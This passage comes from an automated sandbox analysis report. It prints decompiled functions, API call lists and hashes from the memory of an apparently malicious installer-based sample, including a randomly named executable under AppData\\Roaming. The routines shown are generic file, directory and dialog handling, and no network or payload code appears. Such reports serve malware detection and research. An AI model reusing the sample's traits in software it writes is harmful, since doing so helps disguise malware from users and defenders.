              								} else {
              									goto L18;
              								}
              							} else {
              								if(_a4 <= 0) {
              									goto L21;
              								} else {
              									while(1) {
              										_t28 = _a4;
              										if(_a4 >= 0x4000) {
              											_t28 = 0x4000;
              										}
              										_v8 = _t28;
              										if(E004060B5( *0x40a01c, 0x414ef0, _t28) == 0) {
              											goto L18;
              										}
              										_t30 = E004060E4(_a8, 0x414ef0, _v8); // executed
              										if(_t30 == 0) {
              											_push(0xfffffffe);
              											L19:
              											_pop(_t22);
              										} else {
              											_t31 = _v8;
              											_a4 = _a4 - _t31;
              											 *0x420ef4 =  *0x420ef4 + _t31;
              											_t36 = _t36 + _t31;
              											if(_a4 > 0) {
              												continue;
              											} else {
              												goto L21;
              											}
              										}
              										goto L22;
              									}
              									goto L18;
              								}
              							}
              						}
              					}
              				}
              				L22:
              				return _t22;
              			}















              APIs
              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 0040332E
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
              • Instruction ID: fc1c1b99c1c3d1c2481461a51282f6204a9bfe71311cf5a9819f6edaa66b9ece
              • Opcode Fuzzy Hash: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
              • Instruction Fuzzy Hash: C6319F70200219EFDB11CF55ED84A9E3FA8FB00355B20443AF905EA1D1D778DE51DBA9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 69%
              			E00401389(signed int _a4, struct HWND__* _a10) {
              				intOrPtr* _t6;
              				void* _t8;
              				void* _t10;
              				signed int _t11;
              				void* _t12;
              				signed int _t16;
              				signed int _t17;
              
              				_t17 = _a4;
              				while(_t17 >= 0) {
              					_t6 = _t17 * 0x1c +  *0x42a2b0;
              					if( *_t6 == 1) {
              						break;
              					}
              					_push(_t6); // executed
              					_t8 = E00401434(); // executed
              					if(_t8 == 0x7fffffff) {
              						return 0x7fffffff;
              					}
              					_t10 = E0040136D(_t8);
              					if(_t10 != 0) {
              						_t11 = _t10 - 1;
              						_t16 = _t17;
              						_t17 = _t11;
              						_t12 = _t11 - _t16;
              					} else {
              						_t12 = _t10 + 1;
              						_t17 = _t17 + 1;
              					}
              					if(_a10 != 0) {
              						 *0x42924c =  *0x42924c + _t12;
              						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
              					}
              				}
              				return 0;
              			}

              APIs
              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
              • Instruction ID: 2e9f13adc1e302feb6e44b0cfdad9a37d499f26753b45a494d358932ab564816
              • Opcode Fuzzy Hash: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
              • Instruction Fuzzy Hash: 2501F431724220EBEB295B389D05B6A3698E710314F10857FF855F66F1E678CC029B6D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00406931(signed int _a4) {
              				struct HINSTANCE__* _t5;
              				signed int _t10;
              
              				_t10 = _a4 << 3;
              				_t8 =  *(_t10 + 0x40a410);
              				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
              				if(_t5 != 0) {
              					L2:
              					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
              				}
              				_t5 = E004068C1(_t8); // executed
              				if(_t5 == 0) {
              					return 0;
              				}
              				goto L2;
              			}

              APIs
              • GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
              • GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                • Part of subcall function 004068C1: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                • Part of subcall function 004068C1: wsprintfW.USER32 ref: 00406913
                • Part of subcall function 004068C1: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
              • String ID:
              • API String ID: 2547128583-0
              • Opcode ID: ce5542d5707cc7159b18b1f0655ddf6d95a06601bb2a9cb3f5ee38c39b2b28c7
              • Instruction ID: ca9fc7dfa89fe5ea16e4639455fc103decb8165a688e618dc96f0396de22bceb
              • Opcode Fuzzy Hash: ce5542d5707cc7159b18b1f0655ddf6d95a06601bb2a9cb3f5ee38c39b2b28c7
              • Instruction Fuzzy Hash: A5E0867390422057E61056705E4CC3773A8ABC4750306443EF556F2140DB38DC35977A
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E00406032(WCHAR* _a4, long _a8, long _a12) {
              				signed int _t5;
              				void* _t6;
              
              				_t5 = GetFileAttributesW(_a4); // executed
              				asm("sbb ecx, ecx");
              				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
              				return _t6;
              			}

              APIs
              • GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,80000000,00000003), ref: 00406036
              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
              • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
              • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
              • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E0040600D(WCHAR* _a4) {
              				signed char _t3;
              				signed char _t7;
              
              				_t3 = GetFileAttributesW(_a4); // executed
              				_t7 = _t3;
              				if(_t7 != 0xffffffff) {
              					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
              				}
              				return _t7;
              			}

              APIs
              • GetFileAttributesW.KERNELBASE(?,?,00405C12,?,?,00000000,00405DE8,?,?,?,?), ref: 00406012
              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406026
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
              • Instruction ID: 2aab62ad23f8cb6709c95f945eae6201b0fb2c2ffcd307ea01f0c72ec21377a4
              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
              • Instruction Fuzzy Hash: 9AD0C972504131ABC2502728EE0889ABF55EF682717014A35F9A5A22B0CB314C628A98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405AF0(WCHAR* _a4) {
              				int _t2;
              
              				_t2 = CreateDirectoryW(_a4, 0); // executed
              				if(_t2 == 0) {
              					return GetLastError();
              				}
              				return 0;
              			}

              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,004035CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405AF6
              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405B04
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CreateDirectoryErrorLast
              • String ID:
              • API String ID: 1375471231-0
              • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
              • Instruction ID: 7b2d9cd717f5aff8da3a1f7dd460dbe6a594badd890d3698b32dee5738bc8dc1
              • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
              • Instruction Fuzzy Hash: 50C04C30204601AEDA509B30DF08B177AA4AF50741F1158396246E40A0DA78A455D92D
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000008.00000002.706730415.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7cf3e08ff55b8ae7de8de1e7d63aac67220cabf838a571d0e20aa61da1f1d5e0
              • Instruction ID: f067571a1418877a6624ed7087d5e08dcb8413a77f4fbcf759377d687eca6414
              • Opcode Fuzzy Hash: 7cf3e08ff55b8ae7de8de1e7d63aac67220cabf838a571d0e20aa61da1f1d5e0
              • Instruction Fuzzy Hash: BCF11026E50398A9EB60CBE4EC55FFDB3B5AF48B50F105497EA0CEE190E7704A80DB15
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004060E4(void* _a4, void* _a8, long _a12) {
              				int _t7;
              				long _t11;
              
              				_t11 = _a12;
              				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
              				if(_t7 == 0 || _t11 != _a12) {
              					return 0;
              				} else {
              					return 1;
              				}
              			}

              APIs
              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040FF7B,0040CEF0,00403511,0040CEF0,0040FF7B,00414EF0,00004000,?,00000000,0040333B,00000004), ref: 004060F8
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
              • Instruction ID: 6979515bda9704ff85578e0c0429e47610ce6c1510064802d49ef9c1332cb9e6
              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
              • Instruction Fuzzy Hash: E3E08C3221022AABEF109E618C04AEB7B6CEB01360F014832FE16E7040D271E9308BE8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004060B5(void* _a4, void* _a8, long _a12) {
              				int _t7;
              				long _t11;
              
              				_t11 = _a12;
              				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
              				if(_t7 == 0 || _t11 != _a12) {
              					return 0;
              				} else {
              					return 1;
              				}
              			}

              APIs
              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040358D,0040A230,0040A230,00403491,00414EF0,00004000,?,00000000,0040333B), ref: 004060C9
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
              • Instruction ID: 6a9dac85b633d085c252a5e98b17eff4fa9db91ceb9277f9f5c2807d74357857
              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
              • Instruction Fuzzy Hash: DCE0E63215026AABDF109E559C04AEB775CEF05751F014836F916E6190D631E93197A4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00403590(long _a4) {
              				long _t2;
              
              				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
              				return _t2;
              			}

              APIs
              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • Sleep.KERNELBASE(?,?,034CF0BF), ref: 02F1128F
              Memory Dump Source
              • Source File: 00000008.00000002.706730415.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction ID: 0ed5d90a96634ea9f89f7d1cf6f0a10d53323473acfa44cc33b6114d1b48ce1d
              • Opcode Fuzzy Hash: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction Fuzzy Hash: FBD05EB1C5034CBFDB08EFE1CC8685DBF7DDB05341F50819AAD0067100DA759B109B94
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              C-Code - Quality: 95%
              			E004056E3(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
              				struct HWND__* _v8;
              				long _v12;
              				struct tagRECT _v28;
              				void* _v36;
              				signed int _v40;
              				int _v44;
              				int _v48;
              				signed int _v52;
              				int _v56;
              				void* _v60;
              				void* _v68;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				struct HWND__* _t94;
              				long _t95;
              				int _t100;
              				void* _t108;
              				intOrPtr _t130;
              				struct HWND__* _t134;
              				int _t156;
              				int _t159;
              				struct HMENU__* _t164;
              				struct HWND__* _t168;
              				struct HWND__* _t169;
              				int _t171;
              				void* _t172;
              				short* _t173;
              				short* _t175;
              				int _t177;
              
              				_t169 =  *0x429244;
              				_t156 = 0;
              				_v8 = _t169;
              				if(_a8 != 0x110) {
              					if(_a8 == 0x405) {
              						CloseHandle(CreateThread(0, 0, E00405677, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
              					}
              					if(_a8 != 0x111) {
              						L17:
              						_t171 = 1;
              						if(_a8 != 0x404) {
              							L25:
              							if(_a8 != 0x7b) {
              								goto L20;
              							}
              							_t94 = _v8;
              							if(_a12 != _t94) {
              								goto L20;
              							}
              							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
              							_a8 = _t95;
              							if(_t95 <= _t156) {
              								L36:
              								return 0;
              							}
              							_t164 = CreatePopupMenu();
              							AppendMenuW(_t164, _t156, _t171, E00406579(_t156, _t164, _t171, _t156, 0xffffffe1));
              							_t100 = _a16;
              							_t159 = _a16 >> 0x10;
              							if(_a16 == 0xffffffff) {
              								GetWindowRect(_v8,  &_v28);
              								_t100 = _v28.left;
              								_t159 = _v28.top;
              							}
              							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
              								_v60 = _t156;
              								_v48 = 0x423748;
              								_v44 = 0x1000;
              								_a4 = _a8;
              								do {
              									_a4 = _a4 - 1;
              									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
              								} while (_a4 != _t156);
              								OpenClipboard(_t156);
              								EmptyClipboard();
              								_t108 = GlobalAlloc(0x42, _t171 + _t171);
              								_a4 = _t108;
              								_t172 = GlobalLock(_t108);
              								do {
              									_v48 = _t172;
              									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
              									 *_t173 = 0xd;
              									_t175 = _t173 + 2;
              									 *_t175 = 0xa;
              									_t172 = _t175 + 2;
              									_t156 = _t156 + 1;
              								} while (_t156 < _a8);
              								GlobalUnlock(_a4);
              								SetClipboardData(0xd, _a4);
              								CloseClipboard();
              							}
              							goto L36;
              						}
              						if( *0x42922c == _t156) {
              							ShowWindow( *0x42a268, 8);
              							if( *0x42a30c == _t156) {
              								E004055A4( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
              							}
              							E0040446B(_t171);
              							goto L25;
              						}
              						 *0x421f18 = 2;
              						E0040446B(0x78);
              						goto L20;
              					} else {
              						if(_a12 != 0x403) {
              							L20:
              							return E004044F9(_a8, _a12, _a16);
              						}
              						ShowWindow( *0x429230, _t156);
              						ShowWindow(_t169, 8);
              						E004044C7(_t169);
              						goto L17;
              					}
              				}
              				_v52 = _v52 | 0xffffffff;
              				_v40 = _v40 | 0xffffffff;
              				_t177 = 2;
              				_v60 = _t177;
              				_v56 = 0;
              				_v48 = 0;
              				_v44 = 0;
              				asm("stosd");
              				asm("stosd");
              				_t130 =  *0x42a274;
              				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
              				_a12 =  *((intOrPtr*)(_t130 + 0x60));
              				 *0x429230 = GetDlgItem(_a4, 0x403);
              				 *0x429228 = GetDlgItem(_a4, 0x3ee);
              				_t134 = GetDlgItem(_a4, 0x3f8);
              				 *0x429244 = _t134;
              				_v8 = _t134;
              				E004044C7( *0x429230);
              				 *0x429234 = E00404E20(4);
              				 *0x42924c = 0;
              				GetClientRect(_v8,  &_v28);
              				_v52 = _v28.right - GetSystemMetrics(_t177);
              				SendMessageW(_v8, 0x1061, 0,  &_v60);
              				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
              				if(_a8 >= 0) {
              					SendMessageW(_v8, 0x1001, 0, _a8);
              					SendMessageW(_v8, 0x1026, 0, _a8);
              				}
              				if(_a12 >= _t156) {
              					SendMessageW(_v8, 0x1024, _t156, _a12);
              				}
              				_push( *((intOrPtr*)(_a16 + 0x30)));
              				_push(0x1b);
              				E00404492(_a4);
              				if(( *0x42a27c & 0x00000003) != 0) {
              					ShowWindow( *0x429230, _t156);
              					if(( *0x42a27c & 0x00000002) != 0) {
              						 *0x429230 = _t156;
              					} else {
              						ShowWindow(_v8, 8);
              					}
              					E004044C7( *0x429228);
              				}
              				_t168 = GetDlgItem(_a4, 0x3ec);
              				SendMessageW(_t168, 0x401, _t156, 0x75300000);
              				if(( *0x42a27c & 0x00000004) != 0) {
              					SendMessageW(_t168, 0x409, _t156, _a12);
              					SendMessageW(_t168, 0x2001, _t156, _a8);
              				}
              				goto L36;
              			}

              APIs
              • GetDlgItem.USER32 ref: 00405741
              • GetDlgItem.USER32 ref: 00405750
              • GetClientRect.USER32 ref: 0040578D
              • GetSystemMetrics.USER32 ref: 00405794
              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B5
              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C6
              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D9
              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E7
              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FA
              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581C
              • ShowWindow.USER32(?,00000008), ref: 00405830
              • GetDlgItem.USER32 ref: 00405851
              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405861
              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587A
              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405886
              • GetDlgItem.USER32 ref: 0040575F
                • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
              • GetDlgItem.USER32 ref: 004058A3
              • CreateThread.KERNEL32(00000000,00000000,Function_00005677,00000000), ref: 004058B1
              • CloseHandle.KERNEL32(00000000), ref: 004058B8
              • ShowWindow.USER32(00000000), ref: 004058DC
              • ShowWindow.USER32(?,00000008), ref: 004058E1
              • ShowWindow.USER32(00000008), ref: 0040592B
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595F
              • CreatePopupMenu.USER32 ref: 00405970
              • AppendMenuW.USER32 ref: 00405984
              • GetWindowRect.USER32 ref: 004059A4
              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BD
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F5
              • OpenClipboard.USER32(00000000), ref: 00405A05
              • EmptyClipboard.USER32 ref: 00405A0B
              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A17
              • GlobalLock.KERNEL32 ref: 00405A21
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A35
              • GlobalUnlock.KERNEL32(00000000), ref: 00405A55
              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A60
              • CloseClipboard.USER32 ref: 00405A66
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
              • String ID: H7B${
              • API String ID: 590372296-2256286769
              • Opcode ID: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
              • Instruction ID: babe9631ed489b332455c35fc9929fd6d80e8fe82f7b5f1866f1dd344d2d825a
              • Opcode Fuzzy Hash: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
              • Instruction Fuzzy Hash: C9B159B1900608FFDF11AFA0DD85AAE7B79FB48354F00847AFA41A61A0CB754E51DF68
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E00404EFF(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
              				struct HWND__* _v8;
              				struct HWND__* _v12;
              				long _v16;
              				signed int _v20;
              				intOrPtr _v24;
              				signed char* _v28;
              				int _v32;
              				void* _v36;
              				signed int _v44;
              				int _v48;
              				signed int* _v60;
              				signed char* _v64;
              				signed int _v68;
              				long _v72;
              				void* _v76;
              				intOrPtr _v80;
              				intOrPtr _v84;
              				void* _v88;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				struct HWND__* _t191;
              				signed int _t203;
              				void* _t206;
              				long _t212;
              				signed int _t216;
              				signed int _t227;
              				void* _t230;
              				void* _t231;
              				int _t237;
              				long _t242;
              				long _t243;
              				signed int _t244;
              				signed int _t249;
              				signed int _t251;
